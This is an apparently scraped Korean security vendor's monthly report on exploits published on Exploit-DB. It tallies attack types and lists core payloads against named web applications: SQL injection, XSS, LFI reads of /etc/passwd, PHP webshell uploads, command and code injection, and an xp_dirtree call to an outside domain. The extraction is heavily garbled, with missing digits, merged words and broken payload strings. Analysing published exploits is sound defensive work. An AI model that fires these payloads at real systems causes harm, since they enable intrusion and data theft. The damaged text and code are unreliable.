EDB 분석보고서 (06.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 Code

Size: px

Start display at page:

Download "EDB 분석보고서 (06.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 Code"

종관 육
7 years ago
Views:

1 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) EDB 분석보고서 (06.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. 06 년 6 월은상반기 Exploit-DB 보고개수가가장많은달이었습니다. 그만큼공격의종류도다양게보고되었습니다. SQL, XSS 등의공격보고개수가가장많았지만새로운공격방법이나공격패턴의특이점은발견되지않았습니다. SQL 대부분은공격난이도및위험도가낮은들이다수였으며, 단순히이있는지확인을위한공격패턴들이었습니다. 그러나해당공격패턴이성공여이발견된프로그램들은추가적인공격이들어올수있으므로발견된페이지와파라미터를확인여시큐어코딩및소프트웨어업데이트가필수적으로요구됩니다. SQL 이외 PHP Code 이발견된개수가 3 위로보고되었습니다. PHP Code 은 SQL 에비해상대적으로위험도가낮은에속지만많은웹사이트가 PHP 로이루어져있어공격빈도가높은입니다. PHP Code 에노출되지않도록 fputs 와 fwrite 등 PHP 에서실제적으로사용되는함수와명령어는미리정의여서쓰는것이요구됩니다.. 별보고개수 보고개수 RFI Command 3 File Upload 3 LFI 4 4 Code 4 XSS 3 SQL 7 총합계 RFI 3 3 Command 별보고개수 File Upload LFI Code 3 XSS 7 SQL. 위험도별분류 위험도 보고개수 백분율 상 5 0.0% % 합계 % 위험도별분류 5 상 공격난이도별현황공격난이도 보고개수 백분율 상 4.08% % % 총합계 % 공격난이도별현황 5 3 상 4. 주요소프트웨어별발생현황 소프트웨어이름 보고개수 5 Wordpress 4 Nagios 3 XuezhuLi FileSharing Kagao Cisco EPC 398 BigTree CMS Notilus Travel Solution Software SugarCRM Drale DBTableViewer Electroweb Viart MyLittleForum jbfilemanager Airia OPAC KpwinSQL Relay Ajax Manager Concrete5 Alibaba Clone BB Script rconfig ibilling Ultrabenosaurus ChatBoard Apache Tiki-Wiki CMS Liferay CE Vicidial Ktools Dokeos wwiki 총합계 49 주요소프트웨어별발생현황 Wordpress Nagios XuezhuLi FileSharing Kagao Cisco EPC 398 BigTree CMS Notilus Travel Solution Software SugarCRM Drale DBTableViewer

2 EDB 분석보고서 (06.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 Code index.php Remote Command Execution POST /%0.0.3./ajaxexplorer/index.php HTTP/ strpage=control/file/editor&strpath=p:/&strfile=terminal.php&strtext =<?php exec($_get["cmd"]);?> XSS index.php XSS POST /%0.0.3./ajaxexplorer/index.php HTTP/ strpage=control/file/editor&strpath=p:/&strfile=terminal.php&strtext =<script>alert(666)</script> File Upload POST / HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Relay Ajax Manager Content-Type: multipart/form-data; boundary= relayb ,.5.,.5.3-7dd009908f / File Upload dd009908f Content-Disposition: form-data; name="file"; filename="info.php" Content-Type: application/octet-stream Relay Ajax Manager Relay Ajax Manager relayb ,.5.,.5.3 <? phpinfo();?> dd009908f XSS Liferay CE < 6. CE GA6 - /liferay/web/guest/ XSS POST /liferay/web/guest/home?p_p_id=58&p_p_lifecycle=&p_p_state= maximized&p_p_mode=view&_58_struts_action=%flogin%fcreat e_account HTTP/. Liferay CE Liferay CE < 6. CE GA6 _58_firstName=%%3E%3Cscript%3Ealert%8%7xss%7%9 %3C% SQL 상 SecurityCheck Extension index.php SQL /index.php?option='or(extractvalue(,concat(0x3a,(select(database()) ))))=' SecurityCheck Extension SQL 상 Nagios XI nagiosim.php SQL Injction /nagiosxi/includes/components/nagiosim/nagiosim.php?mode=resolv e&host=a&service='+and+(select++from(select+count(*),co NCAT(' APIKEY ',(SELECT+MID((IFNULL(CAST(backend_ticket+AS+CH AR),0x0)),,54)+FROM+xi_users+WHERE+user_id%3d+LIMIT+0,), ' APIKEY ',FLOOR(RAND(0)*))x+FROM+INFORMATION_SCHEMA.CH ARACTER_SETS+GROUP+BY+x)a)+OR+' Nagios Nagios XI 5..7

3 EDB 분석보고서 (06.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 LFI rconfig downloadfile.php LFI /lib/crud/downloadfile.php?download_file=/etc/passwd rconfig rconfig SQL 상상 Notilus Travel Solution Software 0 R3 - Password.aspx SQL POST /company/profilv4/password.aspx HTTP/. ACTION=&H_OLD=mypass'%3bdeclare%0@q%0varchar(99)%3 bset%0@q%3d'\\\\testdomain.mydo'%b'main.com\\vps'% 3b%0exec%0master.dbo.xp_dirtree%0@q%3b-- %0&H_NEW=%7+or+%7%7%3D%7&H_NEW=%7+or+ %7%7%3D%7 Notilus Travel Solution Travel Solution S Software 0 R SQL 상 Double Opt-In for Download Plugin admin-ajax.php SQL POST /wp-admin/adminajax.php?action=populate_download_edit_form HTTP/. Wordpress Double Opt- In for Download Plugin.0. id=0 UNION SELECT,, 4, 5, 6, 7, user_pass FROM wp_users WHERE ID= RFI WP Mobile Detector /wp-content/plugins/wp-mobiledetector/resize.php?src= Plugin resize.php RFI Wordpress WP Mobile Detector Plugin SQL Electroweb Online Examination System.0 - showtest.php SQL /showtest.php?subid=%0and%0=-- Electroweb Electroweb Online Examination System Command Nagios XI nagiosim.php Command /nagiosxi/includes/components/nagiosim/nagiosim.php?mode=update& token=<apitoken>&incident_id=<valid incident id>&title=title'; touch /tmp/file; echo&status= Nagios Nagios XI Command Nagios XI graphapi.php Command /nagiosxi/includes/components/perfdata/graphapi.php?host=<any monitoredhost IP>&start=&end=; touch /tmp/file; Nagios Nagios XI 5..7

4 EDB 분석보고서 (06.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 XSS /continuum/security/useredit_confirmadminpassword.action?userad minpassword=&username=guest&user.username=guest<script>alert( rocheckup.com&user.password=password&user.confirmpassword=pa ssword&user.timestampaccountcreation=&user.timestamplastlogin =&user.timestamplastpasswordchange=&user.locked=false&user.pas swordchangerequired=false&method:confirmadminpassword=subm Apache Continuum.4. - it&cancel=cancel< useredit_confirmadminpasswo _confirmadminpassword.action?useradminpassword=&username=g rd.action XSS uest&user.username=guest%3cscript%3ealert(document.cookie)%3 c/script%3e&user.fullname=guest&user. =blah@procheckup.co m&user.password=password&user.confirmpassword=password&user. timestampaccountcreation=&user.timestamplastlogin=&user.timest amplastpasswordchange=&user.locked=false&user.passwordchange Required=false&method:confirmAdminPassword=Submit&cancel=Ca ncel> Apache Apache Continuum LFI Simple Backup /wpadmin/tools.php?page=backup_manager&download_backup_file=ol Plugin.7. - tools.php LFI 취 약점 dbackups/../../../../../../etc/passwd Simple Backup Plugin XSS POST /goform/administration HTTP/. Cisco EPC /goform/administration XSS 취 약점 Cisco EPC 398 Cisco EPC 398 working_mode=0&sysname=<script>alert('xss')</script>&syspasswd= home&sysconfirmpasswd=home&save=save+settings&preworkingm ode=&h_wlan_enable=enable&h_user_type=common XSS Cisco EPC /goform/wclientmaclist POST /goform/wclientmaclist HTTP/. Cisco EPC 398 Cisco EPC 398 sortwireless=mac&h_sortwireless=mac" onmouseover=alert() x="y SQL Drale DBTableViewer /vul_test/dbtableviewer/ SQL /vul_test/dbtableviewer/?orderby=nice_name%0rlike%0(select %0(CASE%0WHEN%0(697=697)%0THEN%00x6e f6e66d65%0else%00x8%0end))&sort=desc&sort=desc Drale DBTableView er Drale DBTableView er SQL PayPlans (com_payplans) Extension index.php?option=com_payplans&group_id=%0and%0= index.php SQL PayPlans (com_payplan s) Extension 3.3.6

5 EDB 분석보고서 (06.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 File Upload Viart Shopping Cart admin_fm_upload_files.php File Upload POST /admin/admin_fm_upload_files.php HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary= dd009908f dd009908f Content-Disposition: form-data; name="newfile_0"; filename="shell.php" Content-Type: application/octet-stream Viart Viart Shopping Cart 5.0 <? phpinfo();?> dd009908f jbfilemanager - jbfm.php /vul_test/jbfilemanager/jbfm/jbfm.php?act=open&path=/../../../../../.. /../../../etc/ jbfilemanage r jbfilemanage r XSS Booking System < eventlist.php XSS /scripts/booking/eventlist.php?serviceid=337%%0onmouseover =%alert() Booking System < SQL En Masse (com_enmasse) Component /component/enmasse/ SQL /component/enmasse/term?tmpl=component&id=%0and%0=- - En Masse (com_enmass e) Component SQL Dokeos.. - slideshow.php SQL /dokeos-../main/document/slideshow.php?cidreq=3&curdirpath=%7 %0AND%0(SELECT%0*%0FROM%0(SELECT(SLEEP(5)))Pfag) %0AND%0%7NFwV%7=%7NFwV&slide_id=all Dokeos Dokeos SQL Booking System < eventlist.php SQL POST /ajax/checkchangeavailability.php HTTP/. Booking System < 5.5 id=' AND SLEEP(5) AND 'WAlE'='WAlE

6 EDB 분석보고서 (06.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 XSS wwiki - index.php XSS POST /vul_test/wwiki/index.php HTTP/. wwiki wwiki page=xss&newtext=afsd%3cimg+src%3d%h%+onerror%3da lert%845%9%3eaa&action=save XSS Ultrabenosaurus ChatBoard - chat.php XSS POST /vul_test/chatboard/ original/chat.php HTTP/. Ultrabenosau rus ChatBoard Ultrabenosau rus ChatBoard msg=654<img src="z" onerror=zz>asd Code Tiki-Wiki CMS Calendar 4., /tikicalendar.php?viewmode=%7;%0$z=fopen%8%shell.php%,%7w Calendar 4., Tiki-Wiki CMS.5 LTS, 9. LTS, and Tiki-Wiki CMS tiki-calendar.php Code %7%9;fwrite%8$z,file_get_contents%8% LTS, 9..txt%%9%9;fclose%8$z%9;%7 LTS, and XSS Vicidial. - admin.php XSS POST / HTTP/. ADD=&DB=&script_id=tests&script_name=<script>alert('XSS!' </script>&script_comments=test& active=y&user_group=---all--- &selectedfield=fullname&script_text=<script>alert('xss!'</script>&submit=submit Vicidial Vicidial File Upload Airia - editor.php File Upload POST /editor.php HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary= dd009908f Airia Airia dd009908f Content-Disposition: form-data; name="file"; filename="shell.php" Content-Type: application/octet-stream <?php echo 'Airia Webshell Exploit';#{shell};?> dd009908f SQL BT Media /index.php?option=com_bt_media&view=list&categories[0]=%0an (com_bt_media) Component - d%0=--&itemid=34 index.php SQL BT Media (com_bt_med ia) Component

7 EDB 분석보고서 (06.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 POST /snews.7./?action=process&task=admin_article&id= HTTP/. AppleWebKit/ Command.7. - /snews.7./ KHTML, like Gecko Chrome/ Command.7. text=[func]system: :"calc.exe"[/func] XSS.7. - /snews.7./ XSS POST /snews.7./?action=process&task=admin_article&id= HTTP/..7. text=[include]<script>alert(document.cookie)</script>[/include] SQL Publisher Pro /index.php?option=com_publisher&view=issues&itemid=%0and% (com_publisher) Component - 0=--&lang=en index.php SQL Publisher Pro (com_publish er) Component api.php /vul_test//api.php?callback=jquery _ &type=get&mode=0&folder=Li4vLi4vLi4vLi4vLi4v Li4vZXRjLw==&_= XuezhuLi FileSharing - download.php /vul_test/filesharing/download.php?file_name=../../../../../../../../../../../../../etc/passwd XuezhuLi FileSharing XuezhuLi FileSharing LFI Alibaba Clone BB Script - show_page.php LFI /show_page.php?page=../configure.php%00 Alibaba Clone BB Script Alibaba Clone BB Script XSS - api.php XSS /vul_test//api.php?callback=jquery _ }}c07%3Cscript%3Ealert%8%9%3C%fsc ript%3ecfea&type=get&mode=0&_=

8 EDB 분석보고서 (06.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 XuezhuLi FileSharing - /vul_test/filesharing/viewing.php?file_name=../../../../../../../../../../../. viewing.php./../etc/passwd XuezhuLi FileSharing XuezhuLi FileSharing SQL 상상 POST /site/index.php/admin/pages/update/ HTTP/. BigTree CMS /site/index.php/admin/pages/u pdate/ SQL page=' and 6=3 or =+(SELECT and ROW(,)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(5),CHAR (00),CHAR(05),CHAR(08),CHAR(0),CHAR(09),CHAR(09),CHA R(97),0x3a,FLOOR(RAND(0)*))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' BigTree CMS BigTree CMS 4.. POST /ibilling/index.php HTTP/ XSS ibilling index.php XSS account=%%3e%3cscript%3ealert()%3c%fscript%3e&compa ny=%%3e%3cscript%3ealert()%3c%fscript%3e& =test %40yahoo.com&phone=%%3E%3Cscript%3Ealert(4)%3C%Fsc ript%3e&address=%%3e%3cscript%3ealert(5)%3c%fscript%3 E&city=%%3E%3Cscript%3Ealert(6)%3C%Fscript%3E&state= %%3E%3Cscript%3Ealert(7)%3C%Fscript%3E&zip=%%3E %3Cscript%3Ealert(8)%3C%Fscript%3E&country=TR&tags%5B%5 D=web_development%%3E%3Cscript%3Ealert(9)%3C%Fscript %3E ibilling ibilling Code MyLittleForum /install/index.php Code POST /install/index.php HTTP/. MyLittleForu m MyLittleForu m.3.5 database=';?><?php echo passthru('/bin/cat /etc/passwd');' SQL Kagao cat.php SQL /cat.php?id= %%0union%0all%0select%0concat %80x7e%C0x7%Cunhex%8Hex%8cast%8database%8% 9%0as%0char%9%9%9%C0x7%C0x7e%9--%0a Kagao Kagao Code SugarCRM index.php Code /index.php?module=connectors&action=runtest&source_id=ext_rest_in sideview&ext_rest_insideview_[%7.phpinfo().%7]= SugarCRM SugarCRM 6.5.8

9 EDB 분석보고서 (06.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 XSS Kagao cat.php XSS /cat.php?id=0&pricestart=0&room=&flache=&price=&zulassung=& kilometer=&kraftstoff=&id3=0&suche=%%3e%3cscript%3ealert %8%7n4tural%7%9%3B%3C%Fscript%3E&id=0&sucheWo =&umkreis=0 Kagao Kagao SQL OPAC KpwinSQL - zaznam.php SQL /zaznam.php?detail_num=%0and%0=-- OPAC KpwinSQL OPAC KpwinSQL GET /concrete5/index.php HTTP/ LFI Concrete index.php LFI X-Original-Url: /tools/../../index Connection: keep-alive Concrete5 Concrete SQL Ultimate Membership Pro Plugin admin-ajax.php SQL POST / HTTP/. action=ihc_preview_user_listing&shortcode=[ihc-list-users filter_by_level="" levels_in="[ihc-list-users filter_by_level="" levels_in="') union all select (SELECT CASE WHEN ($sql) then else *(select table_name from information_schema.tables) end)#" theme="ihc-theme_" theme="ihc-theme_ Wordpress Ultimate Membership Pro Plugin SQL POST / HTTP/. Ktools Photostore mgr.login.php SQL 취 약점 Ktools Ktools Photostore =%7%0and%0=--;#

76 XSS 하 Huge-IT Slider admin.php XSS

76 XSS 하 Huge-IT Slider admin.php XSS 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) EDB 분석보고서 (05.06) 05.06.0~05.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 05 년 6 월에공개된 Exploit-DB 의분석결과, LFI 공격에대한보고개수가가장많았습니다. LFI 공격은대체적으로공격난이도는낮지만공격이성공했을경우시스템의주요파일들이노출되거나파일다운로드가가능해지기때문에위험도가높은공격으로분류됩니다.